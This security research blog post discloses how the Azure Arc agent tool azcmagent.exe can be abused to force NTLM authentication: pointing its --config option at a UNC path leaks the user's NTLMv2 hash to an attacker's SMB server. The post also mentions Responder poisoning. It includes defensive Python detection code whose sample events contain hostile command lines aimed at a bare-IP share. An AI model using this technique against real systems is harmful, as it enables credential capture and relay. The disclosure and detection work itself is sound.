Date Uploaded: September 2nd, 2024

In a Windows network, NT LAN Manager (NTLM) is a set of Microsoft security protocols that provide authentication, integrity, and confidentiality for users. It was the default network authentication method in the Windows NT 4.0 operating system. The latest version, NTLMv2, incorporates the NT MD4 hash function, producing 128-bit hashes for both local and domain accounts.

There are several methods in Windows to trigger an authentication and capture the user’s credentials using tools like Responder. If a user on the network attempts to access a machine and incorrectly types the IP address or name, Responder will respond to the request and prompt for the NTLMv2 hash to access the resource. Responder achieves this by poisoning LLMNR, mDNS, and NetBIOS requests on the network. Without proper mitigations, Windows can be easily manipulated to leak hashes. Any document format that supports loading external files via UNC paths is susceptible to this vulnerability. However, it’s important to note that an attacker must still persuade the user to perform a specific action.

In this short article, I want to introduce another “living off the land” tool that I’ve recently been exploring. This tool can be used to make a user’s machine authenticate to a target of the operator’s choosing, which demonstrates both its practical application and its potential risks.

The Azure Connected Machine agent command-line tool, azcmagent.exe, is used to manage Azure Arc. It assists in configuring, managing, and troubleshooting a server’s connection with Azure Arc. Installed alongside the Azure Connected Machine agent, azcmagent.exe controls actions specific to the server where it is running. Once the server is connected to Azure Arc, the Azure CLI or Azure PowerShell module can be used to enable extensions, manage tags, and perform various operations on the server resource.

An interesting aspect of azcmagent.exe is that it is a standard PE file that can be easily moved to a target machine and launched using PowerShell. While many of its functions require local administrator permissions, others do not require special permissions. One such option is --config, which tells the tool where to read the configuration it will use to set up the Azure Arc instance. This path is not limited to local files; pointing it at a network location turns the read into a network call that forces NTLM authentication.

To demonstrate the potential misuse of this tool for offensive purposes, I set up my own SMB server using impacket’s smbclient.py. I then targeted my attacker’s SMB share using azcmagent.exe with the vulnerable options. As shown in the image, I successfully captured the NTLMv2 hash of the user running the tool.

[Image: PoC_01]

[Image: PoC_02]
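From the defender's side, the behaviour above is easy to spot in process-creation telemetry. The following is an added example (not code from the original post or from the Azure Connected Machine agent): a small Python check over constructed Sysmon-style events that flags azcmagent.exe launched with --config pointing at a UNC path, and adds secondary indicators such as the binary running outside its expected install directory. The install directory, the event field names, and all sample values are assumptions.

```python
import ntpath
import re
from typing import Dict, List, Optional

# Constructed process-creation events (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Program Files\AzureConnectedMachineAgent\azcmagent.exe",
     "CommandLine": r"azcmagent.exe connect --config C:\arc\config.json", "User": r"CORP\svc-arc"},
    {"Image": r"C:\Users\alice\Downloads\azcmagent.exe",
     "CommandLine": r"azcmagent.exe connect --config \\10.0.0.99\share\cfg.json", "User": r"CORP\alice"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe \\fileserver\docs\notes.txt", "User": r"CORP\bob"},
    {"Image": r"C:\Temp\azcmagent.exe",
     "CommandLine": r'azcmagent.exe --config="\\fs01.corp.local\arc$\c.yaml"', "User": r"CORP\alice"},
]

# Assumed default install directory of the agent (not stated on the page); tune to your estate.
EXPECTED_DIR = r"c:\program files\azureconnectedmachineagent"

# --config <path> or --config=<path>, optionally quoted, where <path> is UNC (\\host\share\...).
UNC_CONFIG_RE = re.compile(r'--config(?:=|\s+)"?(\\\\[^\s"\\]+\\[^\s"]*)', re.IGNORECASE)
IPV4_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")

def inspect_event(event: Dict[str, str]) -> Optional[dict]:
    """Return a finding if azcmagent.exe was launched with --config pointing at a UNC path."""
    image = event.get("Image", "")
    if ntpath.basename(image).lower() != "azcmagent.exe":
        return None
    m = UNC_CONFIG_RE.search(event.get("CommandLine", ""))
    if not m:
        return None  # local config file: the tool's expected use
    target = m.group(1)
    host = target.lstrip("\\").split("\\", 1)[0]  # \\host\share\file -> host
    reasons = ["--config points at a UNC path, so the agent will authenticate to that host over SMB"]
    if not ntpath.dirname(image).lower().startswith(EXPECTED_DIR):
        reasons.append(f"binary runs outside the expected install directory: {image}")
    if IPV4_RE.fullmatch(host):
        reasons.append("UNC host is a bare IP address rather than a known server name")
    return {"user": event.get("User", "?"), "target": target, "host": host, "reasons": reasons}

def scan(events: List[Dict[str, str]]) -> List[dict]:
    """Run inspect_event over a batch of events and keep only the findings."""
    return [f for f in (inspect_event(e) for e in events) if f is not None]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['user']} -> {f['target']}: " + "; ".join(f["reasons"]))
```

Correlating a hit with an outbound SMB connection from the same host to the UNC target confirms that the authentication actually fired.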

This example highlights how seemingly benign tools can be repurposed for malicious activities. The issue of forced authentication in Microsoft environments remains a challenging problem for Microsoft to fully address. Companies cannot completely prevent this type of attack on a fully functional Windows environment without significantly compromising user usability. It is important to be aware that new tools used by hybrid cloud services can also be exploited maliciously in Windows environments.

This finding was reported to Microsoft on May 31, 2024. After careful investigation, Microsoft Security Response Center assessed the case as having moderate severity and determined that it does not meet their criteria for immediate servicing. As a result, the case was closed.